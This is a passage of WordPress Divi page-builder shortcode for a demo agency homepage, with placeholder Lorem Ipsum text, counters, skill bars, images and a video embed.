animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#fcd21d\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" 